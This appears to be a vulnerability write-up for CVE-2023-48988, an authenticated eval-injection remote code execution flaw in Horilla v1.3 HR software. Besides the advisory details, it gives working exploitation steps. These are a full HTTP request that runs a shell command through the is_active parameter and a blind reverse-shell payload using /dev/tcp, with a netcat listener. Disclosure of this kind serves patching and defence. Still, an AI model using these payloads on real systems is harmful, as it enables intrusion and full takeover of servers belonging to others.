Horilla v1.3 Authenticated RCE via Eval Injection (CVE-2023-48988)

### Key Information #### Vulnerability Overview - **Vulnerability Type**: Authenticated Remote Code Execution (RCE) - **Affected Version**: Horilla v1.3 - **Fixed Version**: 1.3.1 - **CVE ID**: CVE-2023-48988 - **Severity**: High (CVSS v3 Base Score: 7.2/10) #### Vulnerability Details - **Description**: In the `project_bulk_archive` view, the use of Python's `eval()` function on user-controlled query parameters leads to an authenticated remote code execution vulnerability. - **Affected Code**: ```python is_active = eval(request.GET.get("is_active")) ``` - **Exploitation Conditions**: - Authenticated user with project archiving permissions (e.g., admin) - At least one project must be created - Code injection via the `is_active` query parameter - When `DEBUG=True`, Django returns detailed error messages, including output of any expressions - Even when `DEBUG=False`, exploitation is possible via blind payloads (e.g., reverse shell) #### Exploitation Steps - **With Debug Mode Enabled**: 1. Create a project 2. Trigger bulk archive operation with malicious request: ```http POST /project/bulk_archive?is_active=__import__('os').popen('id').read() HTTP/1.1 Host: localhost:8000 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://localhost:8000/project/project-view/ Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 70 Origin: http://localhost:8000 DNT: 1 Connection: keep-alive Cookie: sessionid=... Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Priority: u=8 csrftoken=... ``` - **With Debug Mode Disabled**: 1. Create a project 2. Trigger bulk archive operation with malicious request: ```http POST /project/bulk_archive?is_active=__import__('os').system('-bash+-i+>+/dev/tcp/IP/PORT+0<&1') ``` 3. On attacker's machine, run: `nc -lvp PORT` #### Impact - **Impact**: Full command execution, potentially leading to server compromise - **Vulnerability Type**: Authenticated Remote Code Execution (RCE) - **CWE ID**: CWE-95: Eval Injection - **Severity**: High (requires authenticated access) - **Exploitability**: High

Goal Reached Thanks to every supporter — we hit 100%!

Horilla v1.3 Authenticated RCE via Eval Injection (CVE-2023-48988)

More from this source